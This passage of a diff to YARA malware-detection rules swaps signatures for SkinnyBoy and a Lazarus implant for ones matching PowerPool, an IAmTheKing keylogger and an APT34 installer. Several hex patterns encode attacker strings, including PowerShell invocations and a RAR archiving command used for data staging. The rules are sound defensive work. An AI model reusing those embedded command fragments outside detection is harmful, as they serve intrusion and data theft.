-		$s3 = { 0f b7 8c 05 fc fe ff ff 66 31 8c 05 fc fb ff ff 0f b7 8c 05 fe fe ff ff 66 31 8c 05 fe fb ff ff 0f b7 8c 05 00 ff ff ff 66 31 8c 05 00 fc ff ff 0f b7 8c 05 02 ff ff ff 66 31 8c 05 02 fc ff ff 83 c0 08 3d 00 01 00 00 72 b6 8d 85 f4 f9 ff ff 50 ff 15 38 81 40 00 8d 85 fc fb ff ff 50 8d 85 f4 f9 ff ff 50 ff 15 40 80 40 00 6a 00 8d 85 f4 f9 ff ff 50 ff 15 28 80 40 00 68 d8 00 00 00 8d 85 24 fe ff ff 6a 00 50 c7 85 fc fd ff ff 1f 00 33 00 c7 85 00 fe ff ff 58 00 4e 00 c7 85 04 fe ff ff 5d 00 1b 00 c7 85 08 fe ff ff 59 00 27 00 c7 85 0c fe ff ff 70 00 2d 00 c7 85 10 fe ff ff 16 00 13 00 c7 85 14 fe ff ff 03 00 1c 00 c7 85 18 fe ff ff 0d 00 2a 00 c7 85 1c fe ff ff 07 00 51 00 c7 85 20 fe ff ff 08 00 13 00 e8 8f 23 00 00 f3 0f 7e 05 d8 bd 40 00 66 a1 00 be 40 00 66 0f d6 85 fc fe ff ff f3 0f 7e 05 e0 bd 40 00 66 0f d6 85 04 ff ff ff f3 0f 7e 05 e8 bd 40 00 66 0f d6 85 0c ff ff ff f3 0f 7e 05 f0 bd 40 00 68 d6 00 00 00 66 89 85 24 ff ff ff 66 0f d6 85 14 ff ff ff f3 0f 7e 05 f8 bd 40 00 8d 85 26 ff ff ff 6a 00 50 66 0f d6 85 1c ff ff ff e8 1f 23 00 00 83 c4 18 33 }
-		$s4 = { 0f b7 84 0d fc fe ff ff 66 31 84 0d fc fc ff ff 0f b7 84 0d fe fe ff ff 66 31 84 0d fe fc ff ff 0f b7 84 0d 00 ff ff ff 66 31 84 0d 00 fd ff ff 0f b7 84 0d 02 ff ff ff 66 31 84 0d 02 fd ff ff 83 c1 08 81 f9 00 01 00 00 72 b5 8d 85 f4 f9 ff ff 50 ff 15 38 81 40 00 8d 85 fc fc ff ff 50 8d 85 f4 f9 ff ff 50 ff 15 40 80 40 00 6a 00 6a 00 8d 85 c0 ed ff ff 50 6a 00 6a 01 56 53 8b 1d 00 80 40 00 c7 85 c0 ed ff ff 00 00 00 00 ff d3 ff b5 c0 ed ff ff 6a 08 ff 15 0c 80 40 00 50 ff 15 08 80 40 00 6a 00 6a 00 8d 8d c0 ed ff ff 51 50 6a 01 56 ff b5 c4 ed ff ff 89 85 bc ed ff ff ff d3 8b 85 c0 ed ff ff 6a 00 68 80 00 00 00 6a 04 6a 00 6a 02 89 85 b8 ed ff ff 68 00 00 00 40 8d 85 f4 f9 ff ff 50 ff 15 18 80 40 00 8b f0 ff 15 1c 80 40 00 8b 1d 38 80 40 00 83 fe ff 74 55 3d b7 00 00 00 75 0b 6a 00 6a 00 6a 00 56 ff }
-		$s5 = { 55 8b ec 83 ec 0c a1 00 d0 40 00 33 c5 89 45 fc 53 8b 5d 08 56 57 6a 00 68 80 00 00 00 6a 03 6a 00 6a 01 68 00 00 00 80 51 89 55 f4 ff 15 18 80 40 00 8b f0 ff 15 1c 80 40 00 8b f8 83 fe ff 74 67 83 ff 02 74 62 6a 00 56 ff 15 58 80 40 00 89 03 85 c0 74 47 c7 45 f8 00 00 00 00 ff 15 0c 80 40 00 ff 33 6a 08 50 ff 15 08 80 40 00 8b 4d f4 6a 00 89 01 8d 4d f8 51 ff 33 50 56 ff 15 14 80 40 00 56 ff 15 20 80 40 00 8b c7 5f 5e 5b 8b 4d fc 33 cd e8 d4 0a 00 00 8b e5 }
-		$s6 = { 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f }
+		$s1 = "%appdata%" fullword ascii
+		$s2 = "%temp%" fullword ascii
+		$s3 = { 43 3a 5c 55 73 65 72 73 5c [2-10] 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c }
+		$s4 = "CreateServiceA" fullword ascii
+		$s5 = { 5c 00 53 00 74 00 72 00 69 00 6e 00 67 00 46 00 69 00 6c 00 65 00 49 00 6e 00 66 00 6f 00 5c 00 25 00 30 00 34 00 78 00 25 00 30 00 34 00 78 00 5c 00 46 00 69 00 6c 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e }
+		$s6 = "\\VarFileInfo\\Translation" fullword wide
+		$s7 = { 5c 00 46 00 69 00 6c 00 74 00 65 00 72 00 [2-8] 2e 00 6a 00 70 00 67 }
+		$s8 = "\\SetupUi" fullword wide
+		$s9 = { 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 25 64 }
+		$s10 = "%s.tmp" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 40KB and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 20KB and 7 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Skinnyboy_Implant_Jun_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Powerpool_Jul_2021_2 : FILE
 {
 	meta:
-		description = "Detect SkinnyBoy Implant"
+		description = "Detect PowerPool malware (ALPC exploit variant)"
 		author = "Arkbird_SOLG"
-		id = "2c78e0f3-a0b3-56fb-b4d2-313c03f1331b"
-		date = "2021-06-05"
-		modified = "2021-06-06"
-		reference = "https://cluster25.io/wp-content/uploads/2021/05/2021-05_FancyBear.pdf"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-06/APT28/MAL_SkinnyBoy_Implant_Jun_2021_1.yara#L1-L19"
+		id = "2988e9a8-da43-51fb-bd39-44aa1d161120"
+		date = "2021-07-09"
+		modified = "2021-07-12"
+		reference = "https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_PowerPool_Jul_2021_2.yara#L1-L23"
 		license_url = "N/A"
-		logic_hash = "37d6b03adaad0a97e91a366d8e5ce47bc0eb77263849422129edf9df28d25bd8"
+		logic_hash = "07d7a6444ddccbf4887de18659147354c9961092bb07ee0148392035a6d27086"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "ae0bc3358fef0ca2a103e694aa556f55a3fed4e98ba57d16f5ae7ad4ad583698"
+		hash1 = "035f97af0def906fbd8f7f15fb8107a9e852a69160669e7c0781888180cd46d5"
+		hash2 = "a72cdb6be7a967d3aa0021d2331b61af84455539e6f127720c9aac9b8392ec24"
+		hash3 = "df7b9d972ac83cc4a590f09d74cb242de3442cc9c1f19ed08f62bd6ebc9fc0fd"
 		tlp = "White"
-		adversary = "APT28"
+		adversary = "IAmTheKing"
 
 	strings:
-		$s1 = { 55 8b ec 81 ec 48 01 00 00 a1 00 00 01 10 33 c5 89 45 fc 53 56 57 6a 00 6a 00 6a 00 8b c2 6a 00 68 6c ef 00 10 89 85 d0 fe ff ff 89 8d cc fe ff ff 89 85 e4 fe ff ff c7 85 c0 fe ff ff 01 00 00 00 c7 85 d8 fe ff ff 00 00 00 00 c7 85 dc fe ff ff 00 00 00 00 ff 15 e4 b1 00 10 8b 1d a4 b0 00 10 8b f0 89 b5 d4 fe ff ff ff d3 8b 3d d4 b1 00 10 85 f6 74 26 6a 04 8d 85 ec fe ff ff 50 6a 06 56 c7 85 ec fe ff ff c0 27 09 00 ff d7 6a 04 8d 85 ec fe ff ff 50 6a 05 56 ff d7 ff d3 85 f6 74 22 6a 01 6a 00 6a 03 6a 00 6a 00 68 bb 01 00 00 ff b5 cc fe ff ff 56 ff 15 cc b1 00 10 89 85 d8 fe ff ff ff d3 8b 4d 08 8b 3d e8 b1 00 10 81 f9 00 00 a0 00 0f 83 a7 01 00 00 68 03 01 00 00 8d 85 f1 fe ff ff 6a 00 50 c6 85 f0 fe ff ff 00 e8 3c 33 00 00 83 c4 0c ba 01 00 00 00 6a 00 6a 01 8d 8d f0 fe ff ff e8 55 f7 ff ff 83 c4 08 8d 55 08 8d 8d e4 fe ff ff e8 94 f6 ff ff 8d bd f0 fe ff ff 8d 4f 01 8a 07 47 84 c0 75 f9 8b 75 08 2b f9 8d 04 37 50 6a 08 89 85 e0 fe ff ff ff 15 b4 b0 00 10 50 ff 15 ec b0 00 10 57 8d 8d f0 fe ff ff 51 50 89 85 d0 fe ff ff e8 62 6e 00 00 8b 85 d0 fe ff ff 83 c4 0c 03 c7 56 8b b5 e4 fe ff ff 56 50 e8 49 6e 00 00 83 c4 0c 56 6a 00 ff 15 b4 b0 00 10 50 a1 b8 b0 00 10 ff d0 57 8d 85 f0 fe ff ff 6a 00 50 e8 96 32 00 00 83 c4 0c 8d 8d d4 fe ff ff 6a 01 ff b5 e0 fe ff ff ff b5 d0 fe ff ff e8 8a f3 ff ff 85 c0 0f 84 7c 03 00 00 8b 85 d4 fe ff ff 8b 3d e8 b1 00 10 85 c0 74 03 50 ff d7 8b 85 d8 fe ff ff 85 }
-		$s2 = { 33 d2 8b c1 b9 00 00 20 00 f7 f1 33 c9 89 8d e4 fe ff ff 3b ca 89 95 b8 fe ff ff 1b d2 f7 da 03 d0 89 95 c4 fe ff ff 0f 84 98 02 00 00 8b ff 8b b5 b8 fe ff ff 85 f6 74 09 8d 42 ff 8b fe 3b c8 74 05 bf 00 00 20 00 57 6a 08 ff 15 b4 b0 00 10 50 ff 15 ec b0 00 10 8b 8d e4 fe ff ff 0f af cf 03 8d d0 fe ff ff 57 8b f0 51 56 89 b5 ec fe ff ff e8 c9 6c 00 00 83 c4 0c 8d 85 f1 fe ff ff 68 03 01 00 00 6a 00 50 c6 85 f0 fe ff ff 00 e8 1c 31 00 00 8b 85 e4 fe ff ff 83 c4 0c 40 6a 00 ff b5 c4 fe ff ff 8b d0 8d 8d f0 fe ff ff 89 85 e4 fe ff ff e8 27 f5 ff ff 83 c4 08 8d 85 e0 fe ff ff 50 6a 00 6a 01 57 56 c7 85 e0 fe ff ff 00 00 00 00 ff 15 24 b0 00 10 85 c0 74 4c ff b5 e0 fe ff ff 6a 08 ff 15 b4 b0 00 10 50 ff 15 ec b0 00 10 8b f0 8d 85 e0 fe ff ff 50 56 6a 01 57 8b bd ec fe ff ff 57 ff 15 24 b0 00 10 57 6a 00 ff 15 b4 b0 00 10 50 a1 b8 b0 00 10 ff d0 8b bd e0 fe ff ff 89 b5 ec fe ff ff 8d b5 f0 fe ff ff 8d 4e 01 8a 06 46 84 c0 75 f9 2b f1 8d 04 3e 50 6a 08 89 85 c8 fe ff ff ff 15 b4 b0 00 10 50 ff 15 ec b0 00 10 56 8d 8d f0 fe ff ff 51 50 89 85 bc fe ff ff e8 d8 6b 00 00 8b 8d bc fe ff ff 83 c4 0c 03 ce 57 8b bd ec fe ff ff 57 51 e8 bf 6b 00 00 83 c4 0c 57 6a 00 ff 15 b4 b0 00 10 50 ff 15 b8 b0 00 10 56 8d 85 f0 fe ff ff 6a 00 50 e8 0d 30 00 00 8b b5 c0 fe ff ff 8b bd bc fe ff ff 83 c4 0c 8d 8d d4 fe ff ff 56 ff b5 c8 fe ff ff 57 e8 fb f0 ff ff 85 c0 0f 84 c9 00 00 00 85 f6 0f 84 c1 00 00 00 8b 85 d4 fe ff ff 8b 35 e8 b1 00 10 85 }
-		$s3 = { 55 8b ec 83 e4 f8 81 ec 34 02 00 00 a1 00 00 01 10 33 c4 89 84 24 30 02 00 00 53 56 57 6a ff ff 35 28 1b 01 10 ff 15 4c b0 00 10 ff 35 28 1b 01 10 ff 15 80 b0 00 10 8b 35 b8 b0 00 10 8b 3d b4 b0 00 10 8d 44 24 10 50 8d 54 24 10 c7 44 24 10 00 00 00 00 c7 44 24 14 00 00 00 00 e8 df 0a 00 00 8b 4c 24 14 83 c4 04 85 c9 0f 84 e6 02 00 00 8b 54 24 0c 33 c0 33 db c7 44 24 20 00 00 00 00 89 44 24 1c 85 c9 0f 84 c2 02 00 00 8d 64 24 00 8b 34 13 8d 04 13 56 6a 08 ff d7 50 ff 15 ec b0 00 10 8b c8 8b 44 24 0c 83 c0 04 56 03 c3 50 51 89 4c 24 24 e8 a7 7e 00 00 8b 44 24 18 03 c3 83 c4 0c 8b 44 06 04 50 6a 08 89 44 24 1c ff d7 50 ff 15 ec b0 00 10 ff 74 24 14 8b f8 8b 44 24 10 03 c3 83 c6 08 03 c6 50 57 e8 72 7e 00 00 83 c4 0c 68 04 01 00 00 6a 08 ff 15 b4 b0 00 10 50 ff 15 ec b0 00 10 68 00 00 00 f0 6a 18 6a 00 8b f0 6a 00 8d 44 24 34 50 c7 44 24 38 00 00 00 00 c7 44 24 3c 00 00 00 00 ff 15 18 b0 00 10 }
-		$s4 = { ff 15 a4 b0 00 10 8d 44 24 28 50 6a 00 6a 00 68 0c 80 00 00 ff 74 24 34 ff 15 14 b0 00 10 ff 15 a4 b0 00 10 6a 00 ff 74 24 18 57 ff 74 24 34 ff 15 0c b0 00 10 ff 15 a4 b0 00 10 6a 00 8d 44 24 30 50 56 6a 02 ff 74 24 38 c7 44 24 40 04 01 00 00 ff 15 10 b0 00 10 ff 74 24 28 ff 15 00 b0 00 10 6a 00 ff 74 24 28 ff 15 04 b0 00 10 8b 54 24 2c 8b 44 24 18 }
-		$s5 = { 50 68 04 01 00 00 ff 15 a8 b0 00 10 8d 44 24 30 50 ff 15 a0 b1 00 10 68 18 ee 00 10 8d 44 24 34 50 ff 15 9c b0 00 10 b8 4d 5a 00 00 66 39 07 0f 85 b2 00 00 00 6a 00 68 80 00 00 00 6a 04 6a 00 6a 02 68 00 00 00 40 8d 44 24 48 50 ff 15 40 b0 00 10 8b f0 ff 15 a4 b0 00 10 83 fe }
-		$s6 = { 6a 00 8d 44 24 28 50 ff 74 24 1c c7 44 24 30 00 00 00 00 57 56 ff 15 38 b0 00 10 56 ff 15 44 b0 00 10 68 80 00 00 00 8d 44 24 34 50 ff 15 48 b0 00 10 8d 44 24 30 50 ff 15 a4 b1 00 10 85 c0 74 2d 8d 44 24 30 50 ff 15 b0 b0 00 10 8b f0 6a 01 56 ff 15 a0 b0 00 10 8d 4c 24 20 51 a3 20 1b 01 10 ff d0 56 89 44 24 20 ff 15 f4 b0 00 10 e8 ad f3 ff ff 57 8b 3d b4 b0 00 10 6a 00 ff d7 8b 35 b8 b0 00 10 50 ff d6 ff 74 24 18 6a 00 ff d7 50 ff d6 8b 44 24 1c 85 c0 74 12 8b 54 24 20 50 b9 4c ef 00 10 e8 77 0c 00 00 83 c4 04 8b 54 24 0c 8b 0c 13 8d 04 13 8d 04 19 83 c3 08 8b 44 10 04 03 c1 03 d8 3b 5c 24 10 0f 82 42 fd ff ff 52 6a 00 ff d7 50 ff d6 68 00 dd 6d 00 ff 35 28 1b 01 10 ff 15 4c b0 00 10 85 c0 0f 85 d4 fc ff ff }
+		$s1 = { 5c 00 53 00 74 00 72 00 69 00 6e 00 67 00 46 00 69 00 6c 00 65 00 49 00 6e 00 66 00 6f 00 5c 00 25 00 30 00 34 00 78 00 25 00 30 00 34 00 78 00 5c 00 46 00 69 00 6c 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e }
+		$s2 = { 2f 00 3f 00 69 00 64 00 3d 00 25 00 73 00 26 00 69 00 6e 00 66 00 6f 00 3d 00 25 00 73 }
+		$s3 = { 72 00 61 00 72 00 2e 00 65 00 78 00 65 00 20 00 61 00 20 00 2d 00 72 00 20 00 25 00 73 00 2e 00 72 00 61 00 72 00 20 00 2d 00 74 00 61 00 25 00 30 00 34 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 20 00 2d 00 74 00 62 00 25 00 30 00 34 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 }
+		$s4 = { 63 00 6d 00 64 00 20 00 2f 00 63 00 20 00 70 00 6f 00 77 00 65 00 72 00 73 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 20 00 24 00 50 00 53 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 54 00 61 00 62 00 6c 00 65 00 2e 00 50 00 53 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 20 00 3e 00 20 00 22 00 25 00 73 00 22 }
+		$s5 = { 63 00 6d 00 64 00 20 00 2f 00 63 00 20 00 70 00 6f 00 77 00 65 00 72 00 73 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 3e 00 20 00 22 00 25 00 73 00 22 }
+		$s6 = { 83 c4 04 53 56 68 [2] 42 00 ba c8 ?? 43 00 e8 ?? a9 ff ff 83 c4 0c 56 68 [2] 42 00 ba c8 ?? 43 00 e8 ?? a9 ff ff 83 c4 08 83 7c 24 20 00 68 40 01 00 00 74 61 33 ed 55 68 88 ?? 43 00 e8 ?? a4 00 00 b8 50 ?? 42 00 83 c4 0c 8b d0 66 8b 08 83 c0 02 66 3b cd 75 f5 bf 88 ?? 43 00 2b c2 83 c7 fe 8d 64 24 00 66 8b 4f 02 83 c7 02 66 3b cd 75 f4 8b c8 c1 e9 02 8b f2 f3 a5 8b c8 83 e1 03 68 90 ?? 42 00 f3 a4 e8 [2] 00 00 83 c4 04 33 f6 89 74 24 20 eb 66 6a 00 68 88 ?? 43 00 e8 ?? a4 00 00 b8 f0 ?? 42 00 83 c4 0c 8b d0 66 8b 08 83 c0 02 66 85 c9 75 f5 bf 88 ?? 43 00 2b c2 83 c7 fe 8d 64 24 00 66 8b 4f 02 83 c7 02 66 85 c9 75 f4 8b c8 c1 e9 02 8b f2 f3 a5 8b c8 83 e1 03 68 98 ?? 42 00 f3 a4 e8 ?? 95 00 00 c7 44 24 24 01 00 00 00 8b 74 24 24 83 c4 04 33 ed 68 d0 07 00 00 a3 d4 ?? 42 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 40KB and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 100KB and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Skinnyboy_Launcher_Jun_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Keylogger_Jul_2021_1 : FILE
 {
 	meta:
-		description = "Detect the Launcher of SkinnyBoy"
+		description = "Detect a keylogger used by IAmTheKing group"
 		author = "Arkbird_SOLG"
-		id = "4e69cba4-92ef-5ea5-95d8-b22ed77f515c"
-		date = "2021-06-05"
-		modified = "2021-06-06"
-		reference = "https://cluster25.io/wp-content/uploads/2021/05/2021-05_FancyBear.pdf"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-06/APT28/MAL_SkinnyBoy_Launcher_Jun_2021_1.yara#L1-L19"
+		id = "186dc5f5-5cc2-551a-a34c-e775085e7f89"
+		date = "2021-07-09"
+		modified = "2021-07-12"
+		reference = "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_Keylogger_Jul_2021_1.yara#L1-L22"
 		license_url = "N/A"
-		logic_hash = "4d5906832a1bc90552255ada1cc9e3c7cd3e14e4b0cb11b1bf2c11c57bca8ad8"
+		logic_hash = "dfdf5892564b93cd1bf564cfe62e37d9477b5ae0bf20e0f9a44ee97b7e3a99f8"
 		score = 75
-		quality = 75
+		quality = 71
 		tags = "FILE"
-		hash1 = "2a652721243f29e82bdf57b565208c59937bbb6af4ab51e7b6ba7ed270ea6bce"
+		hash1 = "4c6995cb65ffeac1272d296eb3273b9fbca7f4d603312a5085b5c3be96154915"
+		hash2 = "79d363a163dfb0088545e66404e0213a9e18d5ee66713d7bc906ed97c46b5ca3"
 		tlp = "White"
-		adversary = "APT28"
+		adversary = "IAmTheKing"
 
 	strings:
-		$s1 = { 55 8b ec 83 e4 f8 81 ec bc 06 00 00 a1 00 e0 40 00 33 c4 89 84 24 b8 06 00 00 53 56 57 33 c0 68 06 02 00 00 50 66 89 84 24 b8 02 00 00 8d 84 24 ba 02 00 00 50 8b f1 e8 64 31 00 00 8b 1d 28 90 40 00 0f 57 c0 83 c4 0c 8d 84 24 9c 02 00 00 50 c7 84 24 a0 02 00 00 79 00 00 00 66 0f d6 84 24 a4 02 00 00 66 0f d6 84 24 ac 02 00 00 c7 84 24 78 02 00 00 57 00 00 00 66 0f d6 84 24 7c 02 00 00 66 0f d6 84 24 84 02 00 00 ff d3 8b d0 33 c9 89 15 38 fb 40 00 85 d2 74 1b 8d 9b 00 00 00 00 66 8b 84 4c 74 02 00 00 66 31 84 4c 9c 02 00 00 41 3b ca 72 eb a1 80 cd 40 00 89 84 24 88 02 00 00 0f b7 05 84 cd 40 00 66 89 84 24 8c 02 00 00 a1 88 cd 40 00 89 84 24 74 02 00 00 0f b7 05 8c cd 40 00 66 89 84 24 78 02 00 00 0f 57 c0 8d 84 24 88 02 00 00 50 66 0f d6 84 24 92 02 00 00 c7 84 24 9a 02 00 00 00 00 00 00 66 c7 84 24 9e 02 00 00 00 00 66 0f d6 84 24 7e 02 00 00 c7 84 24 86 02 00 00 00 00 00 00 66 c7 84 24 8a 02 00 00 00 00 ff d3 8b d0 33 c9 89 15 38 fb 40 00 }
-		$s2 = { 66 8b 84 4c 74 02 00 00 66 31 84 4c 88 02 00 00 41 3b ca 72 eb 6a 64 6a 08 ff 15 30 90 40 00 50 ff 15 34 90 40 00 8b 1d 3c 90 40 00 89 44 24 0c 56 8d 84 24 b4 02 00 00 50 ff d3 8b 3d 44 91 40 00 8d 84 24 b0 02 00 00 50 ff d7 68 90 cd 40 00 8d 84 24 b4 02 00 00 50 ff d3 8d 44 24 20 50 8d 84 24 b4 02 00 00 50 ff 15 40 90 40 00 8b f0 8d 84 24 b0 02 00 00 50 89 74 24 14 ff 15 40 91 40 00 8d 84 24 b0 02 00 00 50 ff d7 83 fe ff 0f 84 21 02 00 00 8b 35 2c 90 40 00 8d 9b 00 00 00 00 8d 84 24 9c 02 00 00 50 8d 44 24 50 50 ff d6 85 }
-		$s3 = { ff 15 20 90 40 00 8d 44 24 14 50 6a 00 6a 00 68 0c 80 00 00 ff 74 24 28 ff 15 04 90 40 00 ff 15 20 90 40 00 6a 00 56 8d 44 24 54 50 ff 74 24 20 ff 15 14 90 40 00 ff 15 20 90 40 00 6a 00 8d 44 24 20 50 ff 74 24 14 c7 44 24 28 64 00 00 00 6a 02 ff 74 24 24 ff 15 10 90 40 00 ff 74 24 14 ff 15 00 90 40 00 6a 00 ff 74 24 1c ff 15 0c 90 40 00 8b 74 24 1c 8b 4c 24 0c ba 90 ed 40 00 83 ee }
-		$s4 = { 0f b7 8c 05 f8 fd ff ff 66 31 8c 05 f8 fe ff ff 0f b7 8c 05 fa fd ff ff 66 31 8c 05 fa fe ff ff 0f b7 8c 05 fc fd ff ff 66 31 8c 05 fc fe ff ff 0f b7 8c 05 fe fd ff ff 66 31 8c 05 fe fe ff ff 83 c0 08 3d 00 01 00 00 72 b6 56 8d 85 f8 fe ff ff 50 8d 85 f0 fb ff ff 68 08 02 00 00 50 e8 ed 04 00 00 6a 44 8d 85 98 fb ff ff 6a 00 50 e8 ed 31 00 00 83 c4 1c 8d 85 e0 fb ff ff 50 8d 85 98 fb ff ff 50 6a 00 6a 00 68 00 00 00 08 6a 00 6a 00 6a 00 8d 85 f0 fb ff ff 50 6a 00 c7 85 98 fb ff ff 44 00 00 00 ff 15 38 90 40 00 8b 4d fc 33 cd 5e e8 b9 04 00 00 8b e5 }
-		$s5 = { 55 8b ec 81 ec 6c 04 00 00 a1 00 e0 40 00 33 c5 89 45 fc 56 33 c0 68 06 02 00 00 50 66 89 85 f0 fb ff ff 8d 85 f2 fb ff ff 50 8b f1 e8 8f 33 00 00 68 04 01 00 00 8d 85 f0 fb ff ff 6a 00 50 e8 7c 33 00 00 83 c4 18 56 ff 15 48 91 40 00 85 c0 0f 84 b6 01 00 00 b8 69 00 00 00 68 d2 00 00 00 66 89 85 24 ff ff ff 8d 85 26 ff ff ff 6a 00 50 c7 85 f8 fe ff ff 1f 00 16 00 c7 85 fc fe ff ff 0b 00 22 00 c7 85 00 ff ff ff 78 00 7c 00 c7 85 04 ff ff ff 00 00 55 00 c7 85 08 ff ff ff 5b 00 2e 00 c7 85 0c ff ff ff 3f 00 03 00 c7 85 10 ff ff ff 04 00 04 00 c7 85 14 ff ff ff 0d 00 15 00 c7 85 18 ff ff ff 47 00 44 00 c7 85 1c ff ff ff 47 00 14 00 c7 85 20 ff ff ff 09 00 68 00 e8 dd 32 00 00 f3 0f 7e 05 48 cd 40 00 66 0f d6 85 f8 fd ff ff f3 0f 7e 05 50 cd 40 00 66 0f d6 85 00 fe ff ff f3 0f 7e 05 58 cd 40 00 66 0f d6 85 08 fe ff ff f3 0f 7e 05 60 cd 40 00 66 0f d6 85 10 fe ff ff f3 0f 7e 05 68 cd 40 00 68 d0 00 00 00 66 0f d6 85 18 fe ff ff f3 0f 7e 05 70 cd 40 00 8d 85 28 fe ff ff 6a 00 50 66 0f d6 85 20 fe ff ff e8 6a 32 00 00 83 c4 18 33 }
-		$s6 = { 0f b7 8c 05 f8 fd ff ff 66 31 8c 05 f8 fe ff ff 0f b7 8c 05 fa fd ff ff 66 31 8c 05 fa fe ff ff 0f b7 8c 05 fc fd ff ff 66 31 8c 05 fc fe ff ff 0f b7 8c 05 fe fd ff ff 66 31 8c 05 fe fe ff ff 83 c0 08 3d 00 01 00 00 72 b6 56 8d 85 f8 fe ff ff 50 8d 85 f0 fb ff ff 68 08 02 00 00 50 e8 ed 04 00 00 6a 44 8d 85 98 fb ff ff 6a 00 50 e8 ed 31 00 00 83 c4 1c 8d 85 e0 fb ff ff 50 8d 85 98 fb ff ff 50 6a 00 6a 00 68 00 00 00 08 6a 00 6a 00 6a 00 8d 85 f0 fb ff ff 50 6a 00 c7 85 98 fb ff ff 44 00 00 00 ff 15 38 90 40 00 8b 4d fc 33 cd 5e e8 b9 04 00 00 8b e5 }
+		$s1 = "sonme hting is wrong x" fullword ascii
+		$s2 = { 25 73 25 73 25 73 25 73 }
+		$s3 = { 0d 0a 5b 44 41 54 41 5d 3a 0d 0a 00 4c 6f 67 2e 74 78 74 }
+		$s4 = { 0d 0a 5b 54 49 4d 45 3a 5d 25 64 2f 25 64 2f 25 64 20 25 30 32 64 3a 25 30 32 64 3a 25 30 32 64 0d 0a 5b 54 49 54 4c 45 3a 5d }
+		$s5 = { 25 73 2d 25 30 32 64 2d 25 30 32 64 2d 25 30 32 64 2d 25 30 32 64 }
+		$s6 = { 6a 00 56 ff 75 f8 8d 45 e4 50 ff 75 f0 ff 75 f4 ff 75 08 ff 15 c4 80 40 00 8b f0 3b f7 74 12 56 ff 15 70 80 40 00 85 c0 75 1b 56 ff 15 78 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 40KB and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 25KB and 5 of ( $s* )
 }
-
-rule ARKBIRD_SOLG_APT_NK_Lazarus_Implant_June_2020_1 : FILE
+rule ARKBIRD_SOLG_APT_APT34_RDAT_Feb_2021_1 : FILE
 {
 	meta:
-		description = "Detect Lazarus implant June 2020"
+		description = "Detect Installer from APT34 group"
 		author = "Arkbird_SOLG"
-		id = "602c33f2-1e34-5267-9154-ada2d6edc64b"
-		date = "2020-06-28"
-		modified = "2020-06-28"
-		reference = "https://twitter.com/ccxsaber/status/1277064824434745345"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-28/APT_NK_Lazarus_Implant_June_2020_1.yar#L3-L23"
+		id = "32f28376-e792-543b-82f7-36ec627b4fab"
+		date = "2021-02-26"
+		modified = "2021-02-27"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-02-26/APT34/APT_APT34_RDAT_Feb_2021_1.yar#L1-L19"
 		license_url = "N/A"
-		logic_hash = "29b6b8d3bdd47707854ed0dc00808d6352934950a8e7244450df78422ff3cb15"
-		score = 75
+		logic_hash = "61ea6eceda0c7d6ec15db87891c4322002c112383c7a4d0089e35db9636bbe73"
+		score = 50
 		quality = 73
 		tags = "FILE"
-		hash1 = "21afaceee5fab15948a5a724222c948ad17cad181bf514a680267abcce186831"
+		level = "experimental"
+		hash1 = "65a6afc027ff851bd325d8a4f2ab4f326dd8f2c230bfd49a213c5afc00df8e2c"
 
 	strings:
-		$s1 = "Upgrade.exe" fullword ascii
-		$s2 = "ver=%d&timestamp=%lu" fullword ascii
-		$s3 = "_update.php" fullword ascii
-		$s4 = "Dorusio Wallet 2.1.0 (Check Update Windows)" fullword wide
-		$s5 = "Content-Type: application/x-www-form-urlencoded" fullword ascii
-		$s6 = "CONOUT$" fullword ascii
-		$s7 = "D$8fD;i" fullword ascii
-		$s8 = "WinHttpOpenRequest" fullword ascii
-		$s9 = "HTTP/1.0" fullword ascii
-		$s10 = "POST" fullword ascii
+		$s1 = "XAVVQxcVAVIfCBYWARQfEBldEU4ZF1JbUFJYCgpCTg==" fullword ascii
+		$s2 = { 0b da 89 5c 24 40 40 38 3d 55 56 }
+		$s3 = { 57 4e 44 31 23 31 2e 32 }
